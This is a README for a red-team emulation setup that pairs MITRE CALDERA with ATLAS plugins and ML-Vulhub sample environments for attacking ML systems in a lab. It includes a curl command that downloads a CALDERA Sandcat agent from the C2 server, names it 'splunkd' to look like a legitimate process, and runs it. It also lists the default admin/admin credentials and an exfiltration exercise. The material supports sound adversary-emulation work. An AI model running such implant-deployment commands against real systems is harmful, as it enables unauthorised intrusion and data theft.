This repository brings together several projects to enable adversary emulation and red-teaming of machine learning (ML) systems. It configures the MITRE CALDERA™ docker image with MITRE ATLAS™ plugins and provides sample ML services and environments for testing.
If you want to jump right in and get hands on, run the quick start demo script.
CALDERA is a cyber security platform designed to easily automate adversary emulation, assist manual red-teams, and automate incident response.
MITRE ATLAS (The Adversarial Threat Landscape for AI Systems) is a knowledge base of adversary tactics, techniques, and procedures targeting ML systems.
Included ATLAS CALDERA Plugins:
- Almanac: Adds the ATLAS Navigator to CALDERA
- Arsenal: Implements ATLAS techniques as CALDERA Abilities and provides sample CALDERA Adversaries that target ML systems
ML-Vulhub is a collection of of scripts for intantiating ML-related services and modeling ML environments
- Clone the repo:
git clone --recursive git@github.com:mitre-atlas/caldera-atlas.git
cd caldera-atlas- Build the CALDERA docker image:
docker-compose build- Run the CALDERA docker image with ATLAS plugins plugins (
almanacandarsenal):
docker-compose up -d- Access the CALDERA interface at localhost.
The default username/password is admin/admin
- Use CALDERA with the Almanac and Arsenal plugins.
If you aren't already familiar with CALDERA, start with the CALDERA documentation.
The Almanac and Arsenal plugins can be accessed under the Plugins heading on the left-hand navigation menu.
Arsenal populates CALDERA with new Abilities that implement ATLAS techniques. It also adds new Adversary Profiles that use ATLAS techniques target ML services and resources. More information is available in the Arsenal documentation.
- Cleanup:
docker-compose downML-Vulhub is a companion project that provides sample ML-enabled services and environments. This example models a compromised ML developer machine that has access to a private s3 bucket containing a model zoo and an internal ML model served with torchserve.
- Startup CALDERA if it's not already running.
docker-compose up -d- Start a test environment from an example on ML VulHub.
cd ml-vulhub/envs/example-00-ml-dev
# perform build and initialization steps
docker-compose build
./init.sh
docker-compose up -d- Launch a Sandcat agent on the mldev container:
docker-compose exec mldev bash -c 'server=http://host.docker.internal:8888; curl -s -X POST -H "file:sandcat.go" -H "platform:linux" $server/file/download -o splunkd; chmod u+x splunkd; ./splunkd -server $server -group red -v'- Use the Abilities and Adversary Profiles provided by Arsenal to run an Operation targeting the ML services and resourcs in the sample environment.
What ML assets can you discover and exfiltrate? What ML services can you discover, target, and attack?
- Cleanup:
Run
docker-compose downfrom both thecaldera-atlasandml-vulhub/envs/example-00-ml-devdirectories.
The provided demo.sh script is a "one-click" script to setup CALDERA with ATLAS plugins and a sample target environment for adversary emulation and red-teaming.
This will:
- build any/all docker containers to run the
calderaapp and start the server in atmuxsession - mount plugins at runtime of the docker container:
arsenal,almanac - build any/all docker containers to run and set up an initial "victim" using
ml-vulhub
Run:
./demo.sh